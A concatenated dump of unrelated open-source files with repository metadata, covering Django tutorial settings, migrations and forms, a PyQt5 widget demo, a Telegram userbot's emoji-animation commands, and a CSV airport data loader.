generateFromFilesWithPrefix(sys.argv[1])
except:
print("GENERATING FROM ALL FILES IN FOLDER" + INPUT_FILE_PATH)
generateAllFiles()
# stopped at ../change_burst_data-master/weekly/packages/gobnilp_formatted/Eclipse20_GAP1_BURST10_incl_bugs-gobnilp_formatted.csv | [
"boshen.cui@gmail.com"
] | boshen.cui@gmail.com |
e0449012ca661e6ea5603910cc72a4fa47e6de80 | ce22502be73ac3d67df3ed252bb38f4ca93f1cb9 | /first_project/HelloWorld/migrations/0001_initial.py | d010245b363252f10556ef20b3c4b4075f20493d | [] | no_license | stevemeekins/Django | 6f3686a73e00d64ae39cda0946863d76f891993c | 9e5c88f21f30bbc949cb8bea7e8e58a9a7b5b4e4 | refs/heads/main | 2023-06-17T08:29:19.238194 | 2021-07-13T21:13:35 | 2021-07-13T21:13:35 | 385,643,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,435 | py | # Generated by Django 3.2.4 on 2021-07-01 16:34
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Topic',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('top_name', models.CharField(max_length=264, unique=True)),
],
),
migrations.CreateModel(
name='Webpage',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=264, unique=True)),
('url', models.URLField(unique=True)),
('topic', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='HelloWorld.topic')),
],
),
migrations.CreateModel(
name='AccessRecord',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('name', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='HelloWorld.webpage')),
],
),
]
| [
"noreply@github.com"
] | stevemeekins.noreply@github.com |
ef884fe19f7e3aae50c5cc78782bc6b0d3f75002 | 21771e2dd1804905b304731be47c22201c04a05a | /venv/bin/pip3 | be8c33a97c8268f3e4095389d85866f063e2d326 | [
"MIT"
] | permissive | TrellixVulnTeam/Awards-app_W4QC | 4ffd38cdaec7ac2898e2b14027ebcc49286db387 | 7529a24984eb797d3af59031a4780bb68e739f24 | refs/heads/master | 2023-03-22T04:02:27.447933 | 2021-01-25T21:27:06 | 2021-01-25T21:27:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | #!/home/moringa/Desktop/Awards/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"kiplangatbett5@gmail.com"
] | kiplangatbett5@gmail.com | |
9c57f1e36d6906aa15462b1128559bb439a2b656 | 9f9ce2c2a04312b42f4d56b13164b28c21b25d3b | /python/beautifulMatrix.py | 8d56dddbf3e1f59ad59ea5e86f3393cf04b3593b | [] | no_license | rahdirs11/CodeForces | a0b376eb919740770e6a5cd04f76b7c9c1ef6edd | 282b0f2ebed3db1951727d1224c44fdb4e9d1a71 | refs/heads/master | 2023-04-12T10:44:44.720469 | 2021-04-27T19:18:30 | 2021-04-27T19:18:30 | 362,223,431 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | # objective is to have index as 2, 2
matrix = [[int(x) for x in input().strip().split()] for _ in range(5)]
row = col = 0
for i, r in enumerate(matrix):
if 1 in r:
row, col = i, r.index(1)
break
print(abs(row - 2) + abs(col - 2))
| [
"iamsridhar11@gmail.com"
] | iamsridhar11@gmail.com |
eeebfbc34e0dc9d7eafab611f0b6eed7ea155f07 | f73bb64f43f502d7b1a65877ec0fac13acb8e798 | /project.py | e321e73de761b2ca593805b0f24edc829c9c9ff0 | [] | no_license | Heisenberg3562/Image-Processing-Gui | 373e66f937fe98a38f81428da202976375a515a1 | e4d87099b977a578b8a0e7170927f58681e46cd1 | refs/heads/master | 2021-03-29T07:15:48.294393 | 2020-03-30T19:34:39 | 2020-03-30T19:34:39 | 247,930,382 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,190 | py | from PyQt5.QtCore import QDateTime, Qt, QTimer
from PyQt5.QtWidgets import (QApplication, QCheckBox, QComboBox, QDateTimeEdit,
QDial, QDialog, QGridLayout, QGroupBox, QHBoxLayout, QLabel, QLineEdit,
QProgressBar, QPushButton, QRadioButton, QScrollBar, QSizePolicy,
QSlider, QSpinBox, QStyleFactory, QTableWidget, QTabWidget, QTextEdit,
QVBoxLayout, QWidget)
class WidgetGallery(QDialog):
    """Demo dialog that showcases common Qt widgets in four panels,
    with a style selector at the top and an auto-advancing progress bar."""
    def __init__(self, parent=None):
        super(WidgetGallery, self).__init__(parent)
        # Remember the startup palette so changePalette() can restore it
        # when the "standard palette" checkbox is unchecked.
        self.originalPalette = QApplication.palette()
        styleComboBox = QComboBox()
        styleComboBox.addItems(QStyleFactory.keys())
        styleLabel = QLabel("&Style:")
        styleLabel.setBuddy(styleComboBox)
        self.useStylePaletteCheckBox = QCheckBox("&Use style's standard palette")
        self.useStylePaletteCheckBox.setChecked(True)
        disableWidgetsCheckBox = QCheckBox("&Disable widgets")
        # Build the four widget panels and the progress bar.
        self.createTopLeftGroupBox()
        self.createTopRightGroupBox()
        self.createBottomLeftTabWidget()
        self.createBottomRightGroupBox()
        self.createProgressBar()
        styleComboBox.activated[str].connect(self.changeStyle)
        self.useStylePaletteCheckBox.toggled.connect(self.changePalette)
        # Toggling "Disable widgets" disables all four panels at once.
        disableWidgetsCheckBox.toggled.connect(self.topLeftGroupBox.setDisabled)
        disableWidgetsCheckBox.toggled.connect(self.topRightGroupBox.setDisabled)
        disableWidgetsCheckBox.toggled.connect(self.bottomLeftTabWidget.setDisabled)
        disableWidgetsCheckBox.toggled.connect(self.bottomRightGroupBox.setDisabled)
        topLayout = QHBoxLayout()
        topLayout.addWidget(styleLabel)
        topLayout.addWidget(styleComboBox)
        topLayout.addStretch(1)
        # NOTE(review): the two checkboxes are wired up but (per the lines
        # commented out below) never added to any layout, so they are not
        # visible in the dialog — confirm whether that is intentional.
        # topLayout.addWidget(self.useStylePaletteCheckBox)
        # topLayout.addWidget(disableWidgetsCheckBox)
        mainLayout = QGridLayout()
        mainLayout.addLayout(topLayout, 0, 0, 1, 2)
        mainLayout.addWidget(self.topLeftGroupBox, 1, 0)
        mainLayout.addWidget(self.topRightGroupBox, 1, 1)
        mainLayout.addWidget(self.bottomLeftTabWidget, 2, 0)
        mainLayout.addWidget(self.bottomRightGroupBox, 2, 1)
        mainLayout.addWidget(self.progressBar, 3, 0, 1, 2)
        mainLayout.setRowStretch(1, 1)
        mainLayout.setRowStretch(2, 1)
        mainLayout.setColumnStretch(0, 1)
        mainLayout.setColumnStretch(1, 1)
        self.setLayout(mainLayout)
        self.setWindowTitle("Styles")
        self.changeStyle('Fusion')
    def changeStyle(self, styleName):
        """Apply the named Qt style application-wide, then refresh the palette."""
        QApplication.setStyle(QStyleFactory.create(styleName))
        self.changePalette()
    def changePalette(self):
        """Switch between the active style's standard palette and the one
        captured at startup, depending on the checkbox state."""
        if (self.useStylePaletteCheckBox.isChecked()):
            QApplication.setPalette(QApplication.style().standardPalette())
        else:
            QApplication.setPalette(self.originalPalette)
    def advanceProgressBar(self):
        """Timer slot: advance the bar by 1% of the remaining range, so it
        asymptotically approaches the maximum without reaching it."""
        curVal = self.progressBar.value()
        maxVal = self.progressBar.maximum()
        # NOTE(review): the true division yields a float, but
        # QProgressBar.setValue expects an int; recent PyQt5 releases raise
        # TypeError here — confirm against the PyQt5 version in use.
        self.progressBar.setValue(curVal + (maxVal - curVal) / 100)
    def createTopLeftGroupBox(self):
        """Panel 1: radio buttons and a tri-state checkbox."""
        self.topLeftGroupBox = QGroupBox("Group 1")
        radioButton1 = QRadioButton("Radio button 1")
        radioButton2 = QRadioButton("Radio button 2")
        radioButton3 = QRadioButton("Radio button 3")
        radioButton1.setChecked(True)
        checkBox = QCheckBox("Tri-state check box")
        checkBox.setTristate(True)
        checkBox.setCheckState(Qt.PartiallyChecked)
        layout = QVBoxLayout()
        layout.addWidget(radioButton1)
        layout.addWidget(radioButton2)
        layout.addWidget(radioButton3)
        layout.addWidget(checkBox)
        layout.addStretch(1)
        self.topLeftGroupBox.setLayout(layout)
    def createTopRightGroupBox(self):
        """Panel 2: default, toggle and flat push buttons."""
        self.topRightGroupBox = QGroupBox("Group 2")
        defaultPushButton = QPushButton("Default Push Button")
        defaultPushButton.setDefault(True)
        togglePushButton = QPushButton("Toggle Push Button")
        togglePushButton.setCheckable(True)
        togglePushButton.setChecked(True)
        flatPushButton = QPushButton("Flat Push Button")
        flatPushButton.setFlat(True)
        layout = QVBoxLayout()
        layout.addWidget(defaultPushButton)
        layout.addWidget(togglePushButton)
        layout.addWidget(flatPushButton)
        layout.addStretch(1)
        self.topRightGroupBox.setLayout(layout)
    def createBottomLeftTabWidget(self):
        """Panel 3: a tab widget with a 10x10 table and a text editor."""
        self.bottomLeftTabWidget = QTabWidget()
        self.bottomLeftTabWidget.setSizePolicy(QSizePolicy.Preferred,
                QSizePolicy.Ignored)
        tab1 = QWidget()
        tableWidget = QTableWidget(10, 10)
        tab1hbox = QHBoxLayout()
        tab1hbox.setContentsMargins(5, 5, 5, 5)
        tab1hbox.addWidget(tableWidget)
        tab1.setLayout(tab1hbox)
        tab2 = QWidget()
        textEdit = QTextEdit()
        textEdit.setPlainText("Twinkle, twinkle, little star,\n"
                              "How I wonder what you are.\n"
                              "Up above the world so high,\n"
                              "Like a diamond in the sky.\n"
                              "Twinkle, twinkle, little star,\n"
                              "How I wonder what you are!\n")
        tab2hbox = QHBoxLayout()
        tab2hbox.setContentsMargins(5, 5, 5, 5)
        tab2hbox.addWidget(textEdit)
        tab2.setLayout(tab2hbox)
        self.bottomLeftTabWidget.addTab(tab1, "&Table")
        self.bottomLeftTabWidget.addTab(tab2, "Text &Edit")
    def createBottomRightGroupBox(self):
        """Panel 4 (checkable): line edit, spin box, date/time edit,
        slider, scroll bar and dial, laid out on a grid."""
        self.bottomRightGroupBox = QGroupBox("Group 3")
        self.bottomRightGroupBox.setCheckable(True)
        self.bottomRightGroupBox.setChecked(True)
        lineEdit = QLineEdit('s3cRe7')
        lineEdit.setEchoMode(QLineEdit.Password)
        spinBox = QSpinBox(self.bottomRightGroupBox)
        spinBox.setValue(50)
        dateTimeEdit = QDateTimeEdit(self.bottomRightGroupBox)
        dateTimeEdit.setDateTime(QDateTime.currentDateTime())
        slider = QSlider(Qt.Horizontal, self.bottomRightGroupBox)
        slider.setValue(40)
        scrollBar = QScrollBar(Qt.Horizontal, self.bottomRightGroupBox)
        scrollBar.setValue(60)
        dial = QDial(self.bottomRightGroupBox)
        dial.setValue(30)
        dial.setNotchesVisible(True)
        layout = QGridLayout()
        layout.addWidget(lineEdit, 0, 0, 1, 2)
        layout.addWidget(spinBox, 1, 0, 1, 2)
        layout.addWidget(dateTimeEdit, 2, 0, 1, 2)
        layout.addWidget(slider, 3, 0)
        layout.addWidget(scrollBar, 4, 0)
        layout.addWidget(dial, 3, 1, 2, 1)
        layout.setRowStretch(5, 1)
        self.bottomRightGroupBox.setLayout(layout)
    def createProgressBar(self):
        """Create the bottom progress bar and a 1-second timer that
        drives advanceProgressBar()."""
        self.progressBar = QProgressBar()
        self.progressBar.setRange(0, 10000)
        self.progressBar.setValue(0)
        timer = QTimer(self)
        timer.timeout.connect(self.advanceProgressBar)
        timer.start(1000)
if __name__ == '__main__':
    # Entry point: build the Qt application, show the demo dialog and
    # hand control over to the Qt event loop.
    import sys
    application = QApplication(sys.argv)
    demo_dialog = WidgetGallery()
    demo_dialog.show()
    sys.exit(application.exec_())
| [
"47453834+Heisenberg3562@users.noreply.github.com"
] | 47453834+Heisenberg3562@users.noreply.github.com |
b5410bc80e87082070c7d91330942c2fb097bacb | df1ffbb21b6b67e71730f44a8c019f78903ba176 | /tango_with_django_project/settings.py | e2abe1f16d3330b0138b560e9beb647c552c1f02 | [] | no_license | Hippodoodle/tango_with_django_project | 2f4773aaf3ab98272501c235d8ce859879b94fdd | 84922a826e60a017258b83a69d516634c7b5b866 | refs/heads/master | 2023-02-28T06:47:27.351240 | 2021-02-08T16:44:17 | 2021-02-08T16:44:17 | 330,429,007 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,678 | py | """
Django settings for tango_with_django_project project.
Generated by 'django-admin startproject' using Django 2.2.17.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# The directory containing all the templates used in each app
TEMPLATE_DIR = os.path.join(BASE_DIR, 'templates')
# The directory containing the static files used
STATIC_DIR = os.path.join(BASE_DIR, 'static')
# The directory containing any media files that are used
MEDIA_DIR = os.path.join(BASE_DIR, 'media')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to the repository; rotate it and load
# it from the environment before any non-tutorial deployment.
SECRET_KEY = '7#^x5i*gzxbvi*fdkxx=0@t93*(=d^7jnma_*ktor@!!r=ntrf'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'rango'
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'tango_with_django_project.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [TEMPLATE_DIR, ],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.media',
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'tango_with_django_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Login
# Named URL the @login_required decorator redirects to.
LOGIN_URL = 'rango:login'
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [STATIC_DIR, ]
# Media files
MEDIA_ROOT = MEDIA_DIR
MEDIA_URL = '/media/'
"2472525m@student.gla.ac.uk"
] | 2472525m@student.gla.ac.uk |
6a1b6fabba750f53a4bc24f7d310b7c13eb2089c | d23d8841c45299e81b5b96b9fb2a656784aaab5a | /firebot/modules/extra.py | cc83e474fd99423222a2a45192818757b644c538 | [
"MIT"
] | permissive | Lightyagami788/Fire-X-1 | e0d3f78b93685084c0087bca8342c70ac5a95381 | 03ad748a531a31183e5a8ce91575524133925b08 | refs/heads/master | 2023-06-30T15:21:16.459381 | 2021-07-27T05:51:25 | 2021-07-27T05:51:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,610 | py | import asyncio
import time
from collections import deque
from telethon.tl.functions.channels import LeaveChannelRequest
from firebot import CMD_HELP, bot
from firebot.utils import fire_on_cmd
# Command handler: ".leave" makes the userbot leave the current group.
# NOTE(review): the decorator references `fire`, which is never imported in
# this module (only `bot`, `CMD_HELP` and `fire_on_cmd` are) — presumably the
# framework injects it at load time; confirm, otherwise this module raises
# NameError on import.
@fire.on(fire_on_cmd("leave$"))
async def leave(e):
    # Only react to our own command-style messages, not ones that start
    # with a letter or another bot's prefix.
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("`I iz Leaving dis Lol Group kek!`")
        # NOTE(review): time.sleep blocks the whole asyncio event loop for
        # 3 seconds; asyncio.sleep would be non-blocking — confirm intent.
        time.sleep(3)
        # A "-" in the chat id looks like the group/channel case; positive
        # ids fall through to the "Not A Chat" message — verify semantics.
        if "-" in str(e.chat_id):
            await bot(LeaveChannelRequest(e.chat_id))
        else:
            await e.edit("`But Boss! This is Not A Chat`")
@fire.on(fire_on_cmd(";__;$"))
# @register(outgoing=True, pattern="^;__;$")
async def fun(e):
    """Animate ';__;' by repeatedly stretching its middle underscore."""
    face = ";__;"
    for _step in range(10):
        face = face[:-1] + "_;"
        await e.edit(face)
@fire.on(fire_on_cmd("yo$"))
# @register(outgoing=True, pattern="^yo$")
async def Ooo(e):
    """Animate 'yo' into an ever longer 'yooo...'."""
    text = "yo"
    for _step in range(15):
        text = text[:-1] + "oo"
        await e.edit(text)
@fire.on(fire_on_cmd("Oof$"))
# @register(outgoing=True, pattern="^Oof$")
async def Oof(e):
    """Animate 'Oof' into an ever longer 'Ooof...'."""
    text = "Oof"
    for _step in range(15):
        text = text[:-1] + "of"
        await e.edit(text)
@fire.on(fire_on_cmd("ccry$"))
# @register(outgoing=True, pattern="^.cry$")
async def cry(e):
    """Replace the trigger message with a crying kaomoji."""
    first_char = e.text[0]
    if first_char.isalpha() or first_char in ("/", "#", "@", "!"):
        return
    await e.edit("(;´༎ຶД༎ຶ)")
@fire.on(fire_on_cmd("fp$"))
# @register(outgoing=True, pattern="^.fp$")
async def facepalm(e):
    """Replace the trigger message with a facepalm emoji."""
    first_char = e.text[0]
    if first_char.isalpha() or first_char in ("/", "#", "@", "!"):
        return
    await e.edit("🤦♂")
# Command handler: ".moon" plays a moon-phase animation by rotating a
# deque of moon emoji and re-editing the message 32 times.
# NOTE(review): this handler, `heart` and `fap` below are all named `_`;
# the decorators register each one before it is shadowed, so all three
# still work, but distinct names would aid debugging.
@fire.on(fire_on_cmd("moon$"))
# @register(outgoing=True, pattern="^.mmoon$")
async def _(event):
    # Ignore forwarded messages.
    if event.fwd_from:
        return
    deq = deque(list("🌗🌘🌑🌒🌓🌔🌕🌖"))
    for _ in range(32):
        await asyncio.sleep(0.1)
        await event.edit("".join(deq))
        deq.rotate(1)
# Command handler: ".source" replies with the userbot's GitHub repository.
@fire.on(fire_on_cmd("source$"))
# @register(outgoing=True, pattern="^.source$")
async def source(e):
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("https://github.com/Chrisdroid1/Fire-X")
# Command handler: ".readme" replies with a link to the project README.
@fire.on(fire_on_cmd("readme$"))
# @register(outgoing=True, pattern="^.readme$")
async def reedme(e):
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("https://github.com/Chrisdroid1/Fire-X/blob/master/README.md")
# Command handler: ".heart" animates a ring of coloured heart emoji by
# rotating a deque and re-editing the message 32 times.
@fire.on(fire_on_cmd("heart$"))
# @register(outgoing=True, pattern="^.heart$")
async def _(event):
    # Ignore forwarded messages.
    if event.fwd_from:
        return
    deq = deque(list("❤️🧡💛💚💙💜🖤"))
    for _ in range(32):
        await asyncio.sleep(0.1)
        await event.edit("".join(deq))
        deq.rotate(1)
# Command handler: ".fap" plays a short emoji rotation animation.
@fire.on(fire_on_cmd("fap$"))
# @register(outgoing=True, pattern="^.fap$")
async def _(event):
    # Ignore forwarded messages.
    if event.fwd_from:
        return
    deq = deque(list("🍆✊🏻💦"))
    for _ in range(32):
        await asyncio.sleep(0.1)
        await event.edit("".join(deq))
        deq.rotate(1)
# Register help text for this module's commands.
# NOTE(review): "clock", "earth" and "myusernames" have no handler in this
# module — presumably leftovers from the upstream module; confirm before
# relying on the help output.
CMD_HELP.update({"leave": "Leave a Chat"})
CMD_HELP.update({"cry": "Cry"})
CMD_HELP.update({"fp": "Send face palm emoji."})
CMD_HELP.update({"moon": "Bot will send a cool moon animation."})
CMD_HELP.update({"clock": "Bot will send a cool clock animation."})
CMD_HELP.update({"readme": "Reedme."})
CMD_HELP.update({"source": "Gives the source of your virtualuserbot"})
CMD_HELP.update({"myusernames": "List of Usernames owned by you."})
CMD_HELP.update({"oof": "Same as ;__; but ooof"})
CMD_HELP.update({"earth": "Sends Kensar Earth animation"})
CMD_HELP.update({"heart": "Try and you'll get your emotions back"})
CMD_HELP.update({"fap": "Faking orgasm"})
| [
"noreply@github.com"
] | Lightyagami788.noreply@github.com |
21c6a8090ebd7816df07d48f28e47fc565e4b74f | 23fe5a4b55121d37f31132755c0ed1cf29c7a2cc | /Python/Airdata/airdata/controllers/DataLoader.py | 99d2e9056905ec0e9f677739b65df8bf0c39b7aa | [] | no_license | iPlessmann/Airdata | 9232a7d9721f999cb0ebda5f9065dedc80d2548d | 3fc0331408cd30904fc5f5cba6f22fc97816038f | refs/heads/master | 2020-12-03T23:02:54.934014 | 2016-11-09T18:12:22 | 2016-11-09T18:12:22 | 66,504,788 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,254 | py | import csv
from airdata.datasource.Countries import countries
from airdata.datasource.Airports import airports
from airdata.datasource.Runways import runways
def load():
    """Populate the module-level countries/airports/runways lists from the
    bundled CSV files and print a count for each.

    Note: the relative paths assume the process is started from a
    directory one level below the project root (Python 2 print syntax).
    """
    loadfile("../resources/countries.csv", 0)
    print "Loaded %s countries" % len(countries)
    loadfile("../resources/airports.csv", 1)
    print "Loaded %s airports" % len(airports)
    loadfile("../resources/runways.csv", 2)
    print "Loaded %s runways" % len(runways)
def loadfile(fileroute, type):
    """Parse one CSV file into the matching module-level list.

    fileroute -- path to the CSV file ('rb' open mode implies Python 2 csv).
    type      -- 0 = countries, 1 = airports, anything else = runways.
                 NOTE(review): this parameter shadows the `type` builtin;
                 a rename would be safer but changes the signature.
    """
    with open(fileroute, 'rb') as csvfile:
        # Sniff the first KiB for a header row, then rewind so the reader
        # starts from the beginning of the file.
        has_header = csv.Sniffer().has_header(csvfile.read(1024))
        csvfile.seek(0)
        spamreader = csv.reader(csvfile)
        if has_header:
            next(spamreader)
        for row in spamreader:
            if type == 0:
                countries.append(
                    {'id': int(row[0]), 'code': row[1], 'name': row[2], 'continent': row[3], 'wikipediaLink': row[4],
                     'keywords': row[5]})
            elif type == 1:
                airports.append(
                    {'id': int(row[0]), 'ident': row[1], 'type': row[2], 'name': row[3], 'latitude_deg': row[4],
                     'longitude_deg': row[5], 'elevation_ft': row[6], 'continent': row[7], 'iso_country': row[8],
                     'iso_region': row[9],
                     'municipality': row[10], 'scheduled_service': row[11], 'gps_code': row[12], 'iata_code': row[13],
                     'local_code': row[14], 'home_link': row[15], 'wikipedia_link': row[16], 'keywords': row[17]})
            else:
                runways.append(
                    {'id': int(row[0]), 'airport_ref': int(row[1]), 'airport_ident': row[2], 'length_ft': row[3],
                     'width_ft': row[4],
                     'surface': row[5], 'lighted': row[6], 'closed': row[7], 'le_ident': row[8],
                     'le_latitude_deg': row[9],
                     'le_longitude_deg': row[10], 'le_elevation_ft': row[11], 'le_heading_degT': row[12],
                     'le_displaced_threshold_ft': row[13],
                     'he_ident': row[14], 'he_latitude_deg': row[15], 'he_longitude_deg': row[16],
                     'he_elevation_ft': row[17], 'he_heading_degT': row[18], 'he_displaced_threshold_ft': row[19]})
| [
"darthplessmann@gmail.com"
] | darthplessmann@gmail.com |
2f64d682aefbbac446f672cd62d06a1f5fc5afaa | 1d1aeb3cee2a691e288b5337800b3f5d0c3ec2b5 | /tango_with_django_project/rango/forms.py | bae8067ef6ddbbc2ad59ebd68b86631b9f01fffc | [] | no_license | MarekReven/tango_with_django | 769ab9324fbd753eea10162123dbcaef38026af3 | fc6adce8ec8cfeffa99732ae1abdeb0a3e194e4d | refs/heads/master | 2020-04-06T07:00:01.455026 | 2016-08-18T18:47:50 | 2016-08-18T18:47:50 | 63,885,089 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,610 | py | from django import forms
from rango.models import Page, Category, UserProfile
from django.contrib.auth.models import User
class CategoryForm(forms.ModelForm):
    """Form for creating a Category; views/likes/slug are hidden and
    filled with defaults (the slug is generated by the model on save)."""
    name = forms.CharField(max_length=128, help_text='Please enter category name')
    views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
    likes = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
    slug = forms.CharField(widget=forms.HiddenInput(), required=False)
    class Meta:
        # Only the name is user-editable.
        model = Category
        fields = ('name',)
class PageForm(forms.ModelForm):
    """Form for adding a Page to a category.

    The explicit field declarations only customise validation, widgets and
    help text; the form fields themselves come from the Page model (Meta).
    """
    title = forms.CharField(max_length=128, help_text='Please enter title of the page')
    url = forms.URLField(max_length=128, help_text='Please enter the URL of the page.')
    views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
    class Meta:
        model = Page
        # The owning category is supplied by the view, not the user.
        exclude = ('category',)
    def clean(self):
        """Normalise the URL: prepend 'http://' when no scheme is given.

        Bug fix: the original did ``url += 'http://' + url``, which turned
        'example.com' into 'example.comhttp://example.com'; it also mangled
        'https://' URLs, which do not start with 'http://'.
        """
        cleaned_data = self.cleaned_data
        url = cleaned_data.get('url')
        if url and not url.startswith(('http://', 'https://')):
            cleaned_data['url'] = 'http://' + url
        return cleaned_data
class UserForm(forms.ModelForm):
    """Registration form for Django's User model; renders the password
    field with a masked input (hashing is handled by the view on save)."""
    password = forms.CharField(widget=forms.PasswordInput())
    class Meta:
        model = User
        fields = ('username', 'email', 'password')
class UserProfileForm(forms.ModelForm):
    """Extra profile fields collected at registration time."""
    class Meta:
        model = UserProfile
        fields = ('website', 'picture')
| [
"mrk.lapinski@gmail.com"
] | mrk.lapinski@gmail.com |
75350d8ea32edec380ac4c03af789e83178ccf47 | c3b95f81a69f20c9e2944cbb2a08a9c7e57a86b7 | /commutify/restapis/migrations/0001_initial.py | 108f2edea6a1d05f56663512c1ab2556459c0247 | [] | no_license | rishav394/Commutify-django | 75b0422de4cb1d7d74e35ac83d20dded5c2eefa1 | e9c471fd9c80b771a5c98d8efd8131393c7a9fb2 | refs/heads/main | 2023-03-26T12:34:56.494572 | 2021-03-28T17:29:41 | 2021-03-28T17:29:41 | 347,695,826 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,400 | py | # Generated by Django 3.1.7 on 2021-03-14 10:33
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated initial migration for the restapis app: creates the
    Domain, Gender, Status, User, UserFriend and UserDomains tables.

    NOTE(review): do not hand-edit applied migrations; also
    MinLengthValidator on the 'dob' DateField looks odd (dates have no
    length) — confirm against the model definition.
    """
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Domain',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=10, null=True, unique=True, validators=[django.core.validators.MinLengthValidator(2)])),
                ('info', models.CharField(max_length=1000, null=True)),
            ],
            options={
                'db_table': 'domain',
            },
        ),
        migrations.CreateModel(
            name='Gender',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('value', models.CharField(max_length=20, null=True, unique=True, validators=[django.core.validators.MinLengthValidator(1)])),
            ],
            options={
                'db_table': 'gender',
            },
        ),
        migrations.CreateModel(
            name='Status',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('value', models.CharField(max_length=30, null=True, unique=True, validators=[django.core.validators.MinLengthValidator(1)])),
            ],
            options={
                'db_table': 'status',
            },
        ),
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100, validators=[django.core.validators.MinLengthValidator(2)])),
                ('email', models.CharField(max_length=100, null=True, unique=True, validators=[django.core.validators.EmailValidator()])),
                ('phone', models.CharField(max_length=10, null=True, unique=True, validators=[django.core.validators.MinLengthValidator(6)])),
                ('password', models.CharField(max_length=100, validators=[django.core.validators.MinLengthValidator(6)])),
                ('dob', models.DateField(null=True, validators=[django.core.validators.MinLengthValidator(1)])),
                ('photo', models.CharField(max_length=400, null=True, unique=True)),
                ('bio', models.CharField(max_length=600, null=True)),
                ('joined_at', models.DateTimeField(auto_now_add=True, null=True)),
                ('updated_at', models.DateTimeField(auto_now=True, null=True)),
                ('gender', models.ForeignKey(db_column='gender', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='restapis.gender')),
            ],
            options={
                'db_table': 'user',
            },
        ),
        migrations.CreateModel(
            name='UserFriend',
            fields=[
